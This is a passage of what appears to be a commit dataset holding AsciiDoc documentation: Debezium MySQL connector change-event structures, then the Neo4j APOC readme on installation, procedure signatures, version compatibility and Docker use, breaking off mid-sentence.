provides the same metadata: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the updated row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events-for-cdc_{context}[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row. The old values are included because some consumers might require them in order to properly handle the removal.\n\nMySQL connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[id=\"mysql-tombstone-events\"]\n.Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s MySQL connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n","old_contents":"\/\/ Metadata created by nebel\n\/\/\n[id=\"mysql-connector-events_{context}\"]\n= MySQL connector events\n\nThe {prodname} MySQL connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed. \n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. 
To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained. \n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converver and you configure it to produce all four basic change event parts, change events have this structure: \n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/<1>\n ...\n },\n \"payload\": { \/\/<2>\n ...\n },\n \"schema\": { \/\/<3> \n ...\n },\n \"payload\": { \/\/<4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. \n\nRarely, converter configuration overrides the key column with some other structure. In this case, the first schema field describes that structure.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed. \n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas. \n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See {link-prefix}:{link-mysql-connector}#the-mysql-connector-and-kafka-topics_{context}[MySQL connector and Kafka topics].\n\n[WARNING]\n====\nThe MySQL connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\n== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. 
Both the schema and its corresponding payload contain a field for each column in the changed table's `PRIMARY KEY` (or unique constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table. \n\n.Example table\n[source,sql]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure. In JSON, it looks like this:\n\n[source,json,index=0]\n----\n{\n \"schema\": { <1>\n \"type\": \"struct\",\n \"name\": \"mysql-server-1.inventory.customers.Key\", <2>\n \"optional\": false, <3>\n \"fields\": [ <4>\n {\n \"field\": \"id\",\n \"type\": \"int32\",\n \"optional\": false\n }\n ]\n },\n \"payload\": { <5>\n \"id\": 1001\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion. \n\n|2\n|`mysql-server-1.inventory.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: + \n\n* `mysql-server-1` is the name of the connector that generated this event. + \n* `inventory` is the database that contains the table that was changed. +\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields` \n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `id` field whose value is `1001`.\n\n|===\n\n== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure. 
\n\nConsider the same sample table that was used to show an example of a change event key: \n\n[source,sql]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\nThe value portion of a change event for a change to this table is described for each event type: \n\n* <<mysql-create-events,_create_ events>>\n* <<mysql-update-events,_update_ events>>\n* <<mysql-delete-events,_delete_ events>>\n\n[id=\"mysql-create-events\"]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\", \/\/ <2>\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.product.connector.mysql.Source\", \/\/ <2>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"mysql-server-1.inventory.customers.Envelope\" \/\/ <2>\n },\n \"payload\": { \/\/ <3>\n \"op\": \"c\", \/\/ <4>\n \"ts_ms\": 1465491411815, \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ 
<7>\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_ms\": 0,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"INSERT INTO customers (first_name, last_name, email) VALUES ('Anne', 'Kretchmar', 'annek@noanswer.org')\"\n }\n }\n}\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table. \n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. In this example: \n\n* `mysql-server-1.inventory.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table.\n\n* `io.product.connector.mysql.Source` is the schema for the payload's `source` field. This schema is specific to the MySQL connector. The connector uses it for all events that it generates. \n\n* `mysql-server-1.inventory.customers.Envelope` is the schema for the overall structure of the payload, where `mysql-server-1` is the connector name, `inventory` is the database, and `customers` is the table.\n\nifdef::community[]\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\nendif::community[]\n\n|3\n|`payload`\n|The value's actual data. This is the information that the change event is providing. \n\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|4\n|`op`\na| Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are: \n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|5\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\n|6\n|`before`\n| An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content. \n\n|7\n|`after`\n| An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|8\n|`source`\na| Mandatory field that describes the source metadata for the event. 
The `source` structure shows MySQL information about this change, which provides traceability. It also has information you can use to compare to other events in this and other topics to know whether this event occurred before, after, or as part of the same MySQL commit as other events. The source metadata includes: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the new row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events-for-cdc_{context}[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|===\n\n[id=\"mysql-update-events\"]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": { \/\/ <2>\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_ms\": 1465581,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 223344,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 484,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"UPDATE customers SET first_name='Anne Marie' WHERE id=1004\"\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1465581029523 \n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. In this example, the `first_name` value is `Anne.`\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `first_name` value is now `Anne Marie`. \n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event is from a different position in the binlog. 
The source metadata includes: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the updated row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events-for-cdc_{context}[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-mysql-connector}#mysql-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row. Details are in the next section. \n====\n\n[id=\"mysql-primary-key-updates\"]\n=== Primary key updates\n\nAn `UPDATE` operation that changes a row's primary key field(s) is known\nas a primary key change. For a primary key change, in place of an `UPDATE` event record, the connector emits a `DELETE` event record for the old key and a `CREATE` event record for the new (updated) key. These events have the usual structure and content, and in addition, each one has a message header related to the primary key change: \n\n* The `DELETE` event record has `__debezium.newkey` as a message header. The value of this header is the new primary key for the updated row.\n\n* The `CREATE` event record has `__debezium.oldkey` as a message header. The value of this header is the previous (old) primary key that the updated row had.\n\n[id=\"mysql-delete-events\"]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_ms\": 1465581,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 223344,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 805,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"DELETE FROM customers WHERE id=1004\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1465581902461 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. 
In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `pos` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the updated row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events-for-cdc_{context}[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row. The old values are included because some consumers might require them in order to properly handle the removal.\n\nMySQL connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[id=\"mysql-tombstone-events\"]\n.Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. 
To make this possible, after {prodname}\u2019s MySQL connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f304341aa434782e5bd709e5882c78bf09f58e7","subject":"Release version 3.5.0.5","message":"Release version 3.5.0.5\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":":readme:\n:branch: 3.5\n:docs: https:\/\/neo4j.com\/docs\/labs\/apoc\/current\n:apoc-release: 3.5.0.5\n:neo4j-version: 3.5.11\n:img: https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/{branch}\/docs\/images\n\n= Awesome Procedures for Neo4j {branch}.x\n\n\/\/ tag::readme[]\n\n== Introduction\n\n\/\/ tag::intro[]\nimage::{img}\/apoc.gif[float=right]\n\n\/\/ tag::intro-text[]\nNeo4j 3.x introduced the concept of user-defined procedures and functions.\nThose are custom implementations of certain functionality that can't be (easily) expressed in Cypher itself.\nThey are implemented in Java and can be easily deployed into your Neo4j instance, and then be called from Cypher directly.\n\nThe APOC library consists of many (about 450) procedures and functions to help with many different tasks in areas like data integration, graph algorithms or data conversion.\n\/\/ end::intro-text[]\n\n=== License\n\nApache License 2.0\n\n\/\/ tag::name-history[]\n=== \"APOC\" Name history\n\n\/\/ tag::name-history-text[]\nhttp:\/\/matrix.wikia.com\/wiki\/Apoc[Apoc^] was the technician and driver on board of the Nebuchadnezzar in the Matrix movie. He was killed by Cypher.\n\n*APOC* was also the first bundled http:\/\/neo4j.com\/blog\/convenient-package-neo4j-apoc-0-1-released\/[A Package Of Component^] for Neo4j in 2009.\n\n*APOC* also stands for \"Awesome Procedures On Cypher\"\n\/\/ end::name-history-text[]\n\/\/ end::name-history[]\n\n\/\/ tag::install-desktop[]\n== Installation: With Neo4j Desktop\n\nAPOC is easily installed with http:\/\/neo4j.com\/download[Neo4j Desktop]. After creating your database, just go to the \"Manage\" screen and the \"Plugins\" tab.\nThen click \"Install\" in the APOC box and you're done.\n\n\/\/ end::install-desktop[]\nimage::{img}\/desktop-apoc.jpg[width=800]\n\n== Feedback\n\n\/\/ tag::feedback[]\nPlease provide feedback and report bugs as https:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/issues[GitHub issues] or join the https:\/\/community.neo4j.com\/c\/neo4j-graph-platform\/procedures-apoc[Neo4j Community Forum and ask in the APOC & Procedures category^].\n\/\/ end::feedback[]\n\n\/\/ tag::calling-procedures[]\n\n== Calling Procedures & Functions within Cypher\n\n\/\/ tag::usage[]\nUser defined *Functions* can be used in *any* expression or predicate, just like built-in functions.\n\n*Procedures* can be called stand-alone with `CALL procedure.name();`\n\nBut you can also integrate them into your Cypher statements, which makes them so much more powerful.\n\n.Load JSON example\n[source,cypher]\n----\nWITH 'https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/{branch}\/src\/test\/resources\/person.json' AS url\n\nCALL apoc.load.json(url) YIELD value as person\n\nMERGE (p:Person {name:person.name})\n ON CREATE SET p.age = person.age, p.children = size(person.children)\n----
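\n\nFor completeness, here is a hedged sketch of issuing the same call from Java through the Neo4j Bolt driver (an assumed dependency; everything outside the Cypher string is this example's own):\n\n[source,java]\n----\nimport org.neo4j.driver.v1.*;\n\n\/\/ Illustrative only: run the Load JSON example over Bolt.\npublic class LoadJsonExample {\n    public static void main(String[] args) {\n        try (Driver driver = GraphDatabase.driver(\"bolt:\/\/localhost:7687\", AuthTokens.basic(\"neo4j\", \"secret\"));\n             Session session = driver.session()) {\n            String cypher = \"CALL apoc.load.json($url) YIELD value AS person \"\n                          + \"MERGE (p:Person {name: person.name}) \"\n                          + \"ON CREATE SET p.age = person.age, p.children = size(person.children)\";\n            session.run(cypher, Values.parameters(\"url\",\n                \"https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/3.5\/src\/test\/resources\/person.json\"));\n        }\n    }\n}\n----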
\n\/\/ end::usage[]\n\/\/ end::calling-procedures[]\n\n\/\/ end::intro[]\n\n\n== APOC Procedures & Functions Overview\n\nAll included procedures are listed in the link:{docs}\/overview[overview in the documentation^] and detailed in subsequent sections.\n\n=== Built in Help\n\n\/\/ tag::help[]\nimage::{img}\/apoc-help-apoc.jpg[width=600]\n\n\n[cols=\"1m,5\"]\n|===\n| call apoc.help('keyword') | lists name, description, signature, roles, based on keyword\n|===\n\n\/\/ end::help[]\n\n== Detailed Feature Documentation\n\nSee the link:{docs}[APOC User Guide^] for documentation of each of the major features of the library, including data import\/export, graph refactoring, data conversion, and more.\n\n\/\/ tag::signature[]\n\n== Procedure & Function Signatures\n\nTo call procedures correctly, you need to know their parameter names, types, and positions.\nAnd for YIELDing their results, you have to know the output column names and types.\n\nINFO: The signatures are shown in error messages if you use a procedure incorrectly.\n\nYou can see the procedure's signature in the output of `CALL apoc.help(\"name\")`:\n\n[source,cypher]\n----\nCALL apoc.help(\"dijkstra\")\n----\n\nThe signature is always `name : : TYPE`, so in this case:\n\n----\napoc.algo.dijkstra\n (startNode :: NODE?, endNode :: NODE?,\n relationshipTypesAndDirections :: STRING?, weightPropertyName :: STRING?)\n:: (path :: PATH?, weight :: FLOAT?)\n----\n\n.Parameter Explanation\n[opts=header,cols=\"m,m\"]\n|===\n| Name | Type\nh| Procedure Parameters |\n| startNode | Node\n| endNode | Node\n| relationshipTypesAndDirections | String\n| weightPropertyName | String\nh| Output Return Columns |\n| path | Path\n| weight | Float\n|===
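\n\nAs a hedged illustration of how that signature maps onto an actual call (the `Place` label, `ROAD` relationship type and `distance` property are invented for this sketch, and `session` is an open Java driver session as in the earlier sketch):\n\n[source,java]\n----\n\/\/ Illustrative only: startNode, endNode, relationshipTypesAndDirections, weightPropertyName.\nStatementResult result = session.run(\n    \"MATCH (a:Place {name: $from}), (b:Place {name: $to}) \"\n  + \"CALL apoc.algo.dijkstra(a, b, 'ROAD>', 'distance') YIELD path, weight \"\n  + \"RETURN path, weight\",\n    Values.parameters(\"from\", \"A\", \"to\", \"B\"));\nresult.forEachRemaining(r -> System.out.println(r.get(\"weight\").asDouble()));\n----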
\nThe trailing `<apoc>` part of the version number will be incremented with every apoc release.\n\n[opts=header]\n|===\n|apoc version | neo4j version\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.5.0.5[3.5.0.5^] | 3.5.11 (3.5.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.4.0.6[3.4.0.6^] | 3.4.12 (3.4.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.3.0.4[3.3.0.4^] | 3.3.6 (3.3.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.2.3.6[3.2.3.6^] | 3.2.9 (3.2.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.1.3.9[3.1.3.9^] | 3.1.7 (3.1.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.0.8.6[3.0.8.6^] | 3.0.5-3.0.9 (3.0.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.5.0.0[3.5.0.0^] | 3.5.0-beta01\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.4.0.2[3.4.0.2^] | 3.4.5\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.3.0.3[3.3.0.3^] | 3.3.5\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.2.3.5[3.2.3.5^] | 3.2.3\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.1.3.8[3.1.3.8^] | 3.1.5\n|===\n\n\/\/ end::version-matrix[]\n=== Get APOC Version\n\nTo know your current `apoc` version, you can use the *function*:\n\n[source,cypher]\n----\nRETURN apoc.version();\n----\n\n\/\/ tag::docker[]\n\n=== Using APOC with the Neo4j Docker image\n\nThe https:\/\/hub.docker.com\/_\/neo4j\/[Neo4j Docker image] allows you to supply a volume for the `\/plugins` folder. \nDownload the APOC release matching your Neo4j version to local folder `plugins` and provide it as a data volume:\n\n[source,bash,subs=attributes]\n----\nmkdir plugins\npushd plugins\nwget https:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/download\/{apoc-release}\/apoc-{apoc-release}-all.jar\npopd\ndocker run --rm -e NEO4J_AUTH=none -p 7474:7474 -v $PWD\/plugins:\/plugins -p 7687:7687 neo4j:{branch}\n----\n\nIf you want to pass custom apoc config to your Docker instance, you can use environment variables, like here:\n\n----\ndocker run \\\n -p 7474:7474 -p 7687:7687 \\\n -v $PWD\/data:\/data -v $PWD\/plugins:\/plugins \\\n --name neo4j-apoc \\\n -e NEO4J_apoc_export_file_enabled=true \\\n -e NEO4J_apoc_import_file_enabled=true \\\n -e NEO4J_apoc_import_file_use__neo4j__config=true \\\n neo4j\n----\n\n====\nIf you want to allow APOC's procedures that use internal APIs, you need to amend `+-e NEO4J_dbms_security_procedures_unrestricted=apoc.\\\\\\*+` to your `docker run ...` command. 
